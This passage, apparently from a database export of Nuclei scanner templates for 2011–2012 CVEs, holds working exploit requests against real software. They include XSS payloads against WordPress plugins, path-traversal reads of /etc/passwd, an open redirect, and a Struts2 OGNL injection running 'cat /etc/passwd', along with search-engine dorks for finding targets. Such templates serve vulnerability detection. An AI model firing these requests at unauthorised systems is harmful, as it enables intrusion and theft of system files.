http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71415\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5106\n cwe-id: CWE-79\n epss-score: 0.00434\n epss-percentile: 0.7412\n cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fractalia\n product: flexible_custom_post_type\n google-query: inurl:\"/wp-content/plugins/flexible-custom-post-type/\"\n tags: cve,cve2011,wordpress,xss,wp-plugin,fractalia\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f0c48064742c5d41e5d5782430cbe65cfb58b1742f92b19ffbe74b895fb4a6702200800d1c7c4d52f58693af881c71484d3dc27308fcee85ac019f1d0f848653aeb:922c64590222798bb761d5b6d8e72950", "hash": "35fb485476c0c8c113f375d1735728d6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee0" }, "name": "CVE-2011-5107.yaml", "content": "id: CVE-2011-5107\n\ninfo:\n name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5107\n cwe-id: CWE-79\n epss-score: 0.00232\n epss-percentile: 0.6058\n cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress\n product: alert_before_you_post\n google-query: inurl:\"/wp-content/plugins/alert-before-your-post\"\n tags: cve,cve2011,wordpress,xss,wp-plugin\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/alert-before-your-post/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100900756dfcc6df6c56c912725d923b0e4907624843873d7fbba36f386e808dab00220782a401d28335add23c3b2a288a4f7a0baaae8d70301ef86c098d36b36d5bc56:922c64590222798bb761d5b6d8e72950", "hash": "0481fbc9ef890ee573766e8ad4888993", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee1" }, "name": "CVE-2011-5179.yaml", "content": "id: CVE-2011-5179\n\ninfo:\n name: Skysa App Bar 1.04 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5179\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5179\n cwe-id: CWE-79\n epss-score: 0.00232\n epss-percentile: 0.61346\n cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: skysa\n product: skysa_app_bar_integration_plugin\n google-query: inurl:\"/wp-content/plugins/skysa-official/\"\n tags: cve,cve2011,wordpress,xss,wp-plugin,skysa\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Skysa App'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a2506e8b9e69b40dd782552d8c266a500621c29093bcef9f8654764f7b7c87d0221008d4c442a6894e2c5eed83217df00622fc53439ae7005c6d5ecdef9bf9848c666:922c64590222798bb761d5b6d8e72950", "hash": "3c9676430e1594ef9942c065b9b763d4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee2" }, "name": "CVE-2011-5181.yaml", "content": "id: CVE-2011-5181\n\ninfo:\n name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5181\n - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5181\n cwe-id: CWE-79\n epss-score: 0.00431\n epss-percentile: 0.71803\n cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: clickdesk\n product: clickdesk_live_support-live_chat_plugin\n google-query: inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'ClickDesk Live Support - Live Chat'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c8eb0ed9f6f8db4abbf7cffe6f186b37ccac30d3ad38d467d9b47579b0033590022025ec9d9119baaf1bc72781bc51273b9c33f28d9eeaf791a077df27a3fa109bfa:922c64590222798bb761d5b6d8e72950", "hash": "26f44628f449e25b5c9a938a50c4b516", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee3" }, "name": "CVE-2011-5252.yaml", "content": "id: CVE-2011-5252\n\ninfo:\n name: Orchard 'ReturnUrl' Parameter URI - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.\n impact: |\n An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks.\n remediation: |\n Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities.\n reference:\n - https://www.exploit-db.com/exploits/36493\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5252\n - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110\n - http://orchard.codeplex.com/discussions/283667\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2011-5252\n cwe-id: CWE-20\n epss-score: 0.02536\n epss-percentile: 0.89931\n cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: orchardproject\n product: orchard\n tags: cve,cve2011,redirect,orchard,orchardproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a0047304502200b2fd44a350bfac8b9bac4f7f86aeb7a8019759723bee2617c7e051c86595fff022100dcf8de39a664b6126476f780592008d1e2b96bd8c83db51134cc0d55ceac2719:922c64590222798bb761d5b6d8e72950", "hash": "b3af48f0b902afd714b6554858e23940", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee4" }, "name": "CVE-2011-5265.yaml", "content": "id: CVE-2011-5265\n\ninfo:\n name: Featurific For WordPress 1.6.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2011-5265\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2011-5265\n cwe-id: CWE-79\n epss-score: 0.00478\n epss-percentile: 0.75288\n cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: featurific_for_wordpress_project\n product: featurific-for-wordpress\n google-query: inurl:\"/wp-content/plugins/featurific-for-wordpress\"\n tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Featurific For Wordpress'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009c6eda4cfeb3627660a657e9f29bda7dd316dd30227e621d8343d91253fde34902203a28c64036832f68f8fc4dad5d7182cb0a9ada862609f0b3caacef9e6171842a:922c64590222798bb761d5b6d8e72950", "hash": "35f87b00f768e403134ac5d3b9119d66", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee5" }, "name": "CVE-2012-0392.yaml", "content": "id: CVE-2012-0392\n\ninfo:\n name: Apache Struts2 S2-008 RCE\n author: pikpikcu\n severity: medium\n description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution on the affected server.\n remediation: Developers should immediately upgrade to at least Struts 2.3.18.\n reference:\n - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545\n - http://www.exploit-db.com/exploits/18329\n - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html\n - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393\n - http://struts.apache.org/2.x/docs/s2-008.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2012-0392\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.9496\n epss-percentile: 0.99239\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve,cve2012,apache,rce,struts,java,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a3b82c57410275caf8c35b404ffc264121702280145d21c64ba210e9567cb6bf02210090f35b30c75342562029ea63c40b3d65ffd05f8f352fb02c7684cb12de64c278:922c64590222798bb761d5b6d8e72950", "hash": "2e7ab4cd0765e8ca7ca48fe1e3b9c857", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee6" }, "name": "CVE-2012-0394.yaml", "content": "id: CVE-2012-0394\n\ninfo:\n name: Apache Struts <2.3.1.1 - Remote Code Execution\n author: tess\n severity: medium\n description: |\n Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server.\n remediation: |\n Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches.\n reference:\n - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/\n - https://www.exploit-db.com/exploits/31434\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394\n - http://www.exploit-db.com/exploits/18329\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0394\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2012-0394\n cwe-id: CWE-94\n epss-score: 0.94527\n epss-percentile: 0.99071\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: struts\n shodan-query: html:\"Struts Problem Report\"\n tags: cve,cve2012,ognl,injection,edb,apache,struts\nvariables:\n first: \"{{rand_int(1000, 9999)}}\"\n second: \"{{rand_int(1000, 9999)}}\"\n result: \"{{to_number(first)*to_number(second)}}\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{result}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950", "hash": "adaeff12d53488d69760d86a616a9e16", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee7" }, "name": "CVE-2012-0896.yaml", "content": "id: CVE-2012-0896\n\ninfo:\n name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access\n author: daffainfo\n severity: medium\n description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.\n remediation: |\n Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/108631/\n - http://plugins.trac.wordpress.org/changeset/488883/count-per-day\n - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896\n - http://wordpress.org/extend/plugins/count-per-day/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-0896\n cwe-id: CWE-22\n epss-score: 0.02262\n epss-percentile: 0.88456\n cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: count_per_day_project\n product: count_per_day\n google-query: inurl:\"/wp-content/plugins/count-per-day\"\n tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022007e631af643f733a4519a2c1e7800b2069ac9f4a8dde3e52a1f02539bec03612022100c502c5c06225e633254d908221898977dd1bd89c3c42fe77d58cf0b9c0662919:922c64590222798bb761d5b6d8e72950", "hash": "3f1f24364a73f7dbcc2a26970ab871e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee8" }, "name": "CVE-2012-0901.yaml", "content": "id: CVE-2012-0901\n\ninfo:\n name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0901\n - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-0901\n cwe-id: CWE-79\n epss-score: 0.00216\n epss-percentile: 0.59612\n cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: attenzione\n product: yousaytoo\n google-query: inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\"\n tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/yousaytoo-auto-publishing-plugin/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e374adf6c147478410125b5e3b625bb2a7e4ec8df4e386b7879f80f3dd203adf02205b345024f1df4be0c598146291c73d2ae06bd1fc59ac90a35b037656b89c724e:922c64590222798bb761d5b6d8e72950", "hash": "5cb76c1380810512e8ddff7009e07506", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee9" }, "name": "CVE-2012-0981.yaml", "content": "id: CVE-2012-0981\n\ninfo:\n name: phpShowtime 2.0 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/18435\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0981\n - http://www.exploit-db.com/exploits/18435\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-0981\n cwe-id: CWE-22\n epss-score: 0.02053\n epss-percentile: 0.8779\n cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kybernetika\n product: phpshowtime\n tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?r=i/../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009ca2f18ad8d070bdf0207d5fa9fc7624457e456cb19ff4ca43ff61f2de60c45c0220088cd5f5b2c7d4c45bdcc82ff376c9dca3910d4e9548446a1f26cf53a7ee27fd:922c64590222798bb761d5b6d8e72950", "hash": "c79e973f6f6f56992e27cf9ede4e7840", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eea" }, "name": "CVE-2012-0991.yaml", "content": "id: CVE-2012-0991\n\ninfo:\n name: OpenEMR 4.1 - Local File Inclusion\n author: daffainfo\n severity: low\n description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of OpenEMR.\n reference:\n - https://www.exploit-db.com/exploits/36650\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0991\n - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72914\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N\n cvss-score: 3.5\n cve-id: CVE-2012-0991\n cwe-id: CWE-22\n epss-score: 0.81788\n epss-percentile: 0.98116\n cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openemr\n product: openemr\n tags: cve,cve2012,lfi,openemr,traversal,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220101d33f30f59a0adfa367a4ee987a541972d7875a7ee03b1619f0d08e9f6b3f9022012689b42fe4983793ea90f15cf61c79b12064888b491888ae3002a7399a21322:922c64590222798bb761d5b6d8e72950", "hash": "acd58ca0091e974418c925f5c3c8f1d0", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eeb" }, "name": "CVE-2012-0996.yaml", "content": "id: CVE-2012-0996\n\ninfo:\n name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)\n author: daffainfo\n severity: medium\n description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36784\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0996\n - https://www.htbridge.ch/advisory/HTB23071\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-0996\n cwe-id: CWE-22\n epss-score: 0.02194\n epss-percentile: 0.89179\n cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 11in1\n product: 11in1\n tags: cve,cve2012,lfi,edb,11in1\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dc98cb6602e352bb8aa5efef1e54d6688d25f22ecbc3efaf5dce9484e5c80bfe02203f7741f62e7ad4d61e9fdc7d9e70ce5d6c6615fd714eba4d750f487ed7c55c29:922c64590222798bb761d5b6d8e72950", "hash": "bb6f6a4247db5021d134ee7e5a61cbc6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eec" }, "name": "CVE-2012-1226.yaml", "content": "id: CVE-2012-1226\n\ninfo:\n name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities\n author: daffainfo\n severity: high\n description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.\n impact: |\n Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36873\n - https://nvd.nist.gov/vuln/detail/CVE-2012-1226\n - http://www.vulnerability-lab.com/get_content.php?id=428\n - http://www.exploit-db.com/exploits/18480\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2012-1226\n cwe-id: CWE-22\n epss-score: 0.10469\n epss-percentile: 0.94495\n cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:3.2.0:alpha:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dolibarr\n product: dolibarr_erp\\/crm\n tags: cve,cve2012,lfi,dolibarr,traversal,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022048642266c0f379d848603893d9e0c91da5249dd516c781d673e4b095329c23d402206b6f1fdea06b9501e7e5b50a7894d3057c08bc006fed84ec71d16a79e2076b90:922c64590222798bb761d5b6d8e72950", "hash": "acb6862e58d84df8cd31b18eeaf6da94", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eed" }, "name": "CVE-2012-1823.yaml", "content": "id: CVE-2012-1823\n\ninfo:\n name: PHP CGI v5.3.12/5.4.2 Remote Code Execution\n author: pikpikcu\n severity: 